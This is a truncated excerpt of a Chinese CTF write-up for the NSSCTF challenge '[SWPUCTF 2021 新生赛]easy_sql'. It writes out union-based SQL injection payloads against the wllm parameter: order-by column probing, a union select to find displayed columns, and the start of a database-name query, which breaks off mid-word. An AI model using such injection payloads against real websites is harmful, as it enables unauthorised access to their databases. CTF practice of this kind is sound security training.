[SWPUCTF 2021 新生赛]easy_sql
感谢平台Nssctf进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm那么我们就传入一个wllm=1,发现有注入点先查看有几个库:?wllm=-1' order by 1--+?wllm=-1' order by 2--+?wllm=-1' order by 3--+接下来查回显:?wllm=union select 1,2,3--+看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
原创
2022-05-06 17:56:01 ·
1564 阅读 ·
0 评论